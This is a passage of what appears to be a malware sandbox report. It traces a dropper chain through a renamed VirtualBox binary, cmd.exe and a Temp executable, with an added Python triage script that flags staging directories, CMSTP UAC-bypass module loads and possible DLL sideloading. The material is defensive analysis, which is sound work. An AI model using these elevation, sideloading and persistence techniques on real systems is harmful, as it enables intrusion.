Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: newdev.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: vboxddu.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: msvcp100.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: newdev.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: devobj.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: devrtl.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: umpdc.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: dbghelp.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: pla.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: pdh.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: tdh.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: cabinet.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: wevtapi.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: shdocvw.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: newdev.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxddu.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: newdev.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: devrtl.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: newdev.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxddu.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: devrtl.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msftedit.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: comsvcs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmlua.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: newdev.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxddu.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxrt.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: newdev.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: devrtl.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: uxtheme.dll
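Added triage example (not part of the Joe Sandbox report, and not code from Joe Security or from the sample): a Python script that reads "Process created" and "Section loaded" lines in the form shown above, rebuilds the parent/child chain, and applies the three checks a responder would run against this one. First, the -burn.clean.room relaunch into C:\Windows\Temp is how every WiX Burn bootstrapper re-executes itself (the burn.pdb string below confirms the engine), so it explains the Temp copy without being suspicious by itself. Second, each later hop lands in a user-writable directory (Windows\Temp, then AppData\Roaming, then AppData\Local\Temp), and the last one is launched by cmd.exe. Third, cmd.exe loads cmlua.dll and cmutil.dll, the modules behind the CMSTPLUA auto-elevated COM class, which matches the "UAC Bypass using CMSTP" Yara hit in the overview. The vboxddu.dll/vboxrt.dll rule is an inference from the VBoxSVC.pdb and VBoxDDU.pdb strings that Virtual.exe is a (renamed) VirtualBox service binary resolving its runtime from the dropped directory; the script can only flag it, the load paths have to be checked separately. The sample lines are copied from this report; the staging-directory list, vendor-DLL prefixes and severities are my heuristics, not Joe Sandbox rules.

```python
import re
from collections import defaultdict

# Constructed sample input: behaviour lines copied from this report, in the
# "Source: <process> Process created: <image> <command line>" and
# "Source: <process> Section loaded: <module>" shapes used above.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\KClGcCpDAP.exe Process created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544',
    r'Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Process created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe "C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe"',
    r'Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Process created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe',
    r'Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe',
    r'Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxddu.dll',
    r'Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Section loaded: vboxrt.dll',
    r'Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmlua.dll',
    r'Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmutil.dll',
    r'Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe Section loaded: schannel.dll',
]

# Image paths in this report contain no spaces, so "\S+" is enough to split
# the image from the command line that follows it.
PROC_RE = re.compile(r'^Source: (?P<parent>.+?) Process created: (?P<image>\S+) (?P<cmdline>.*)$')
LOAD_RE = re.compile(r'^Source: (?P<proc>.+?) Section loaded: (?P<module>\S+)$')

# Directories a standard user can write to; a binary running from one of
# these was dropped, not installed (my heuristic list, not a Joe Sandbox rule).
STAGING_DIRS = ('\\appdata\\roaming\\', '\\appdata\\local\\temp\\', '\\windows\\temp\\')

# cmlua.dll and cmutil.dll back the CMSTPLUA auto-elevated COM class; a shell
# pulling them in is the load pattern behind the "UAC Bypass using CMSTP" hit.
CMSTP_MODULES = {'cmlua.dll', 'cmutil.dll'}

# Non-OS runtime DLLs a dropped binary has to bring along; their on-disk
# paths need checking for side-by-side (sideload) copies (heuristic prefixes).
VENDOR_PREFIXES = ('vbox', 'msvcr', 'msvcp')


def in_staging_dir(path):
    return any(d in path.lower() for d in STAGING_DIRS)


def parse(lines):
    """Split report lines into parent -> children and process -> modules maps."""
    children = defaultdict(list)
    modules = defaultdict(list)
    for line in lines:
        m = PROC_RE.match(line)
        if m:
            children[m['parent']].append((m['image'], m['cmdline']))
            continue
        m = LOAD_RE.match(line)
        if m:
            modules[m['proc']].append(m['module'].lower())
    return children, modules


def triage(lines):
    """Return (severity, process, reason) findings in report order."""
    children, modules = parse(lines)
    findings = []
    for parent, kids in children.items():
        for image, cmdline in kids:
            if '-burn.clean.room=' in cmdline:
                # WiX Burn bootstrappers always re-exec themselves this way; it
                # explains the Windows\Temp copy but is not malicious on its own.
                findings.append(('info', image, 'WiX Burn clean-room relaunch of the installer'))
            elif in_staging_dir(image):
                sev = 'high' if parent.lower().endswith('\\cmd.exe') else 'medium'
                findings.append((sev, image, f'launched from a user-writable directory by {parent}'))
    for proc, mods in modules.items():
        hit = CMSTP_MODULES & set(mods)
        if proc.lower().endswith('\\cmd.exe') and hit:
            findings.append(('high', proc, f'shell loaded CMSTP elevation modules {sorted(hit)}'))
        vendor = sorted({m for m in mods if m.startswith(VENDOR_PREFIXES)})
        if vendor and in_staging_dir(proc):
            findings.append(('medium', proc, f'dropped binary resolved vendor runtime DLLs {vendor}; verify load paths for sideloading'))
    return findings


def ancestry(lines, image):
    """Walk from one process image back to the root of the chain."""
    children, _ = parse(lines)
    parent_of = {kid: parent for parent, kids in children.items() for kid, _ in kids}
    chain = [image]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return list(reversed(chain))


if __name__ == '__main__':
    for sev, proc, why in triage(SAMPLE_LINES):
        print(f'[{sev:6}] {proc}: {why}')
    print(' -> '.join(ancestry(SAMPLE_LINES, r'C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe')))
```

Run against the full report, the same parser also picks up the "Source: unknown" parents (the three Virtual.exe restarts with no recorded creator), which is worth reporting separately because it usually means a persistence trigger rather than a direct child of the chain; the LNK pointing at ..\Roaming\TlsCloud_WRv3_x64\Virtual.exe further down is the artefact to check first.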
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
Source: xdhqslqcnobw.4.dr LNK file: ..\..\Roaming\TlsCloud_WRv3_x64\Virtual.exe
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Windows\SysWOW64\msftedit.dll
Source: KClGcCpDAP.exe Static file information: File size 8656211 > 1048576
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe File opened: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dll
Source: KClGcCpDAP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KClGcCpDAP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KClGcCpDAP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KClGcCpDAP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KClGcCpDAP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KClGcCpDAP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KClGcCpDAP.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: KClGcCpDAP.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: KClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: msvcp100.amd64.pdb source: Virtual.exe, 00000002.00000003.1711778991.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724662734.00000000665EF000.00000002.00000001.01000000.0000000C.sdmp, Virtual.exe, 00000003.00000002.1780293522.000000006646F000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxDDU\VBoxDDU.pdb source: Virtual.exe, 00000002.00000002.1726253927.00007FFE0E175000.00000002.00000001.01000000.00000009.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1781691145.00007FFE01345000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: msvcr100.amd64.pdb source: Virtual.exe, 00000002.00000003.1712097641.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724966337.00000000666D1000.00000002.00000001.01000000.0000000A.sdmp, Virtual.exe, 00000003.00000002.1780499574.0000000066551000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxSVC\VBoxSVC.pdb source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: ntdll.pdb source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 